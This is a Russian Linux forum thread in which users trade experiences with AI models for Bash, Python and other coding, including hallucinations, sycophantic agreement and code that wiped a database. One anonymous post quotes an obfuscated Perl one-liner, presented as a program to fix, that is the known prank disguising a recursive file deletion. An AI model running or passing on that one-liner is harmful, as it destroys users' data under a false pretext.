LINUX.ORG.RU

Программирование с помощью нейросетей

,

0

2

Посоветуйте модели, которые хорошо справляются с кодингом и обучением кодингу. Чем больше языков знает модель - тем лучше.

В данный момент мне нужно писать скрипты на Bash. Хочу делегировать эту задачу нейросетям.

Чем больше языков знает модель

Тем хуже она знает каждый из них.

Это касается и естественных языков, и всего остального.

Do one thing and do it well.

mord0d ★★★★★
()
Последнее исправление: mord0d (всего исправлений: 1)

Ни одна. Баш не умеет никто пока, потому что мало примеров.

А так одну не посоветуешь - их учили всех по-разному. Для разных языков разные пробуй. И подход надо искать.

Делегировать полностью не получится никакой язык. Нужны правильные промты. Проще всего не на естественном языке, а на каком нибудь простеньком яп - на том же питоне. Плюс объяснение как менять.

Нейросеть не волшебник. Считай, что общаешься с очень социально активным аутистом.

Попробуй скрипты на питоне, на луа. С этим у них попроще. Можно интеграцию: питон+небольшие скриптики на баш самые просыте или луа+баш.

Я сам не пробовал, но сейчас очень популярен js, можно его попробовать.

LightDiver ★★★★★
()
Последнее исправление: LightDiver (всего исправлений: 2)

За нейросетями надо глаз да глаз. Делегировать не получится. Тебе все за ней надо будет проверять. ДОСКОНАЛЬНО. И каждую задачу разжёвывать до мелкой кашицы. ТЗ должно быть как для идиота, каким-то образом выучившигося на программиста, но идиотом оставшегося. Доверить в целом можно только что-то элементарное, пусть и объемное.

Qwentor ★★★★★
()
Ответ на: комментарий от anonymous

наиболее доступный в РФ

Это связано не с вопросами РФ или не-РФ, а с тем, что она открыта, благодаря чему энтузиасты подпилили для сносной работы на хорошей ПеКарне.

DarkAmateur ★★★★
()

''' помогите, пожалуйста исправить такую программу:

cat «test… test… test…» | perl -e ‘$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|{;;y; -/:-@[-{-};`-{/" -;;s;;$_;see’

• не печатает '''

Вот, буквально из соседней темы. Нифига эти ваши LLM не панацея.

anonymous
()
Ответ на: комментарий от LightDiver

Ни одна. Баш не умеет никто пока, потому что мало примеров.

4о и дикпик отлично пишут баш, пайтон и ансибл. Только объемное ничего не просите.

Из локальных - mistral-small 24b и codestral понравились.

pekmop1024 ★★★★★
()
Ответ на: комментарий от pekmop1024

Я проверял и мистраль и дипсика и квена и минимакса. Остальных не проверял. Все эти не умеют баш даже в рамках десятка строк. Я хз откуда они берут знания, они не знают инструментов осей, сбиваются на несуществующее, мыслят в рамках убунты в основном.

LightDiver ★★★★★
()
Последнее исправление: LightDiver (всего исправлений: 1)

Ты хочешь прям best practices и изъебства? Так не умеет. Но рабочие решения может. Мне например накостылял конфигурируемый скрипт, который тушит сервисы, делает снапшот, включает обратно и стримит тарбол в бэкап-сервер. Красиво все, параметризовано, с fancy logging и разбивкой на функции. Я бы сам так писать вообще обломался, но когда можно нагрузить искусственного идиота, why not?

pekmop1024 ★★★★★
()

Полностью ты ее не делегируешь. Т.к. частенько они вместо реальных функций придумывают херню. Но под наблюдением разработчика помочь могут. Для начала попробуй https://copilot.microsoft.com/, также попробуй встроенные сразу в редактор Cursor AI и VSCode + Amazon Q, все есть в бесплатных версиях.

rumgot ★★★★★
()

Промпт: «напиши скрипт на bash, который делает то, что мне нужно»

Исправленный промпт: «напиши скрипт на bash, который делает то, что мне нужно, но НЕ патч бармина»

router ★★★★★
()
Последнее исправление: router (всего исправлений: 1)
Ответ на: комментарий от Qwentor

Или наоборот обучение, как ни странно. Что-то вроде «расскажи, как на bash сделать что-то-там, с примером кода»

Разумеется, это необходимо будет проверять, но на то оно и обучение

router ★★★★★
()
Ответ на: комментарий от anonymous

помогите, пожалуйста исправить такую программу

из lorquotes:

Бля после запуска, Windows 3.11 с НТФС как х@ем сбрило!

Киньте ссылку на прогу, которая на НТФС файлы восстанавливает, а то погиб мой сервер!

ЗЫ: Найду автора, яйцы повыкручиваю.

//SuperAdmin

router ★★★★★
()
Ответ на: комментарий от router

Ты упустил еще десять промтов типа такаого: «Да **ть, я же сказал - НЕ патч бармина, железяка ты тупоголовая, ты вообще читаешь что я написал? А нахрена ты убрал то что уже полезного сделал?!»

Причем после каждого он искренне извиняется и в следущем же коде грохает тебе базу. Я так недельный контент БД потерял на луа, когда впервые столкнулся с ИИ. С тех пор все проверяю… и уже делаю бэкапы.

А вообще стараюсь не давать ему реальных адресов, где настоящие диски, базы содержатся. Если что подправить сделать - на тестовых площадках. А дальше реальное сам подставляешь.

LightDiver ★★★★★
()
Последнее исправление: LightDiver (всего исправлений: 4)
Ответ на: комментарий от router

Ну да, обучение через нейронки норм. Можно спросить что-то такое, что нагуглить не получается и оно ответит. Но проверять обязательно, поскольку может тупо нафантазировать на тему или выдать ответ протухшей актуальности.

Я заметил, нейронки очень не любят давать ответ «я не знаю». Если оно не знает, то будет нести всякую околесицу и выдумывать всякую чушь

Qwentor ★★★★★
()
Последнее исправление: Qwentor (всего исправлений: 2)

короч башу на бесплатном qwen который на HF, если знаешь что тебе нужно, то вполне можешь вытянуть норм, на python тож хорошо, опять же тут больше от тебя зависит…чем больше у тебя опыта и понимания, тем вайбовее кодинг ойо

anonymous
()

Ну, то есть однострочники он может - не спорю. От 5 до 10 строк уже с трудом через кучу промтов. Выше 10 строк - проще самому написать.

$ cat /usr/local/bin/backupserver.sh | wc -l
193

Такой себе «однострочник» с относительно сложной логикой, чеками и ретраями.

pekmop1024 ★★★★★
()
Ответ на: комментарий от pekmop1024

Хрен знает, может я промты просто не умею. Мне проще на луа или питоне сделать теперь, чем на баше. Хотя много лет я все делал именно на баше. Забавно.

Я все скрипты свои уже переписал на луа, питон, кое что на раст.

LightDiver ★★★★★
()
Ответ на: комментарий от Qwentor

Я заметил, что лучше не спорить с ChatGPT. Например, спрашиваешь «Какой самый популярный язык», он говорит C, а ты ему, «но ведь больше всего кода написано java script», а он тогда «да действительно ошибся, java script самый популярный» и так по любому вопросу. То есть он априори считает, что ты не можешь ошибаться, или не хочет расстраивать.

masa ★★
()
Ответ на: комментарий от Obezyan

А, кажись в последний раз я собирался одемонить сервис свой. В генте на опенрц.

Точнее сначала я попытался сделать проект полностью на баш - переключалку клавиатуры и запоминание раскладки для отдельных окон.

В итоге сдался, написал на раст: https://github.com/Vladgobelen/NSkbd

Затем попытался одемонить эту хренотень и тоже забил.

LightDiver ★★★★★
()
Ответ на: комментарий от masa

Это тоже заметил. Ещё если дать непосильную задачу для бесплатной версии, со слишком большим временем выполнения, он теряет контекст, в итоге выдает нерабочую ссылку на результат. Потом если ему на это указать, он извиняться будет. Причем никогда не откажет, не скажет, что это долго и не получится. Просто возьмёт под козырек, накосячит, а потом будет извиняться

Qwentor ★★★★★
()

Я все скрипты свои уже переписал на луа, питон, кое что на раст.

Сам я тоже пишу на пайтоне, но это обычно что-то посложнее пары сотен строк, а с таким проблемы уже даже у платной гопоты, не говоря про локальные модельки. Но вот придти и за полчасика накидать подобную хреньку - самое оно. А еще оно иногда прикольно галлюцинирует, чем наталкивает на нестандартные пути решения некоторых задач.

pekmop1024 ★★★★★
()

Claude 3.7 sonnet > Gemini 2.5 pro (гемини лучше работает когда токенов 100к+). Но баш много кто может писать, даже openai и дипсики с этим справляются.

KillTheCat ★★★★★
()

Мне понравилось пользоваться нейросетью для программирования в формате: Вот кусок кода, сделай так чтобы стало так и так, проверил - сработало, потом следующую маленькую задачу и так далее. Но это имеет смысл только для технологии, которую сам толком не знаешь(я использовал для Vue+JS фронтенда). Я вот не вебер абсолютно(плюсовик десктопщик), но случайно в жизни пришлось писать\дорабатывать фронтенд, и вот тут то мне дипсик и помог, без него я бы неделю доки читал, а так он мне делает как нужно(например сделать кнопки в 2 колонки и отцентрировать), так ещё и рассказывает почему делать надо именно так.

А для основной работы, где я синьор, мне нейросети помочь ничем не могут, т.к. работа совсем другая, где чаще думать надо два дня, чтобы исправить ошибку в одной строчке.

Loki13 ★★★★★
()
Последнее исправление: Loki13 (всего исправлений: 1)

Есть мнение, что сетки хорошо пишут только то, что ты и сам за 15 минут нагуглишь по официальным докам и стековерфлоу.
Из своего опыта попросил недавно сетку набросать на крестах многопоточный парсер csv.gz, так и не получил результата, либо все в один поток, либо что-то сломано.

vazgen05 ★★★
()

В данный момент мне нужно писать скрипты на Bash. Хочу делегировать эту задачу нейросетям.

А начиналось всё со скачивания рефератов, вместо похода в библиотеку и/или в читальный зал для самостоятельной работы с соответствующей литературой… Некий Денис Яцутко «Записки библиотекаря» на эту грустную тему написал. ☹

Mischutka ★★★★★
()
Последнее исправление: Mischutka (всего исправлений: 1)

Лучшей нейросетью для программирования и обучения является мозг. И ещё долго ею будет. А скрипты на bash лучше не писать вообще.

ugoday ★★★★★
()
Ответ на: комментарий от alysnix

Логика такая, что пока 1 ядро распаковывает gz, готовые куски можно уже разбирать параллельно.
То что накакала сетка работает медленнее парсера через стримы на nodejs.

vazgen05 ★★★
()
Ответ на: комментарий от alysnix

А в чём проблема? Каждая строчка файла csv разбирается отдельно и независимо от других. Поэтому делишь файл на части, разбираешь, потом объединяешь. Начиная с некоторого размера выгода от многопоточности начинает превышать потери от возни с правильным определением границ обрабатываемых блоков и объединением результатов.

ugoday ★★★★★
()

Пока лучшее применение ИИ в кодинге, что я находил – это сгенерировать пример использования такой-то либы в таком-то контексте, не копаясь слишком долго в документации. Быстро попробовать, решить оправдало ожидания или нет – и дальше руками.

По сути умный поиск по документации. Помню пытался добиться от нейронки того, в чём был пробел и в документации – не осилило оно.

snizovtsev ★★★★★
()
Последнее исправление: snizovtsev (всего исправлений: 2)